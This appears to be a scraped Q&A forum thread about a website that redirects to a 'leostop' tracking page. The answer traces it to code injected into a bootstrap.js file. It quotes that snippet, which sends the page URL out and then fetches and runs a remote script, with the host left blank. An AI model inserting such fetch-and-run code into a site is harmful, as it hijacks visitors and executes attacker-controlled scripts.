My Web Site Redirect Http: //Leostop. Com/Tracking/Tracking. Php? Full_Url=Http//Mywebsite [Closed]
My Website Redirects Itself to This Site: . Why Does This Happen and How Do I Solve This Situation? Thanks. .. 3 1 Answer Search for the Phrase "Leostop" in...
my website redirects itself to this site : . Why does this happen and how do i solve this situation? Thanks...
Search for the phrase "leostop" in your project source code and remove the code related to it.
I too encountered the same problem, for me, the code to redirect is written in bootstrap.js file.
var protocol = location.protocol;
$.ajax({ type: "get", data: { surl: getURL() }, success: function (response) { $.getScript(protocol + "//"); } });
I removed this above code and it solved the problem for me.
I hope it helps.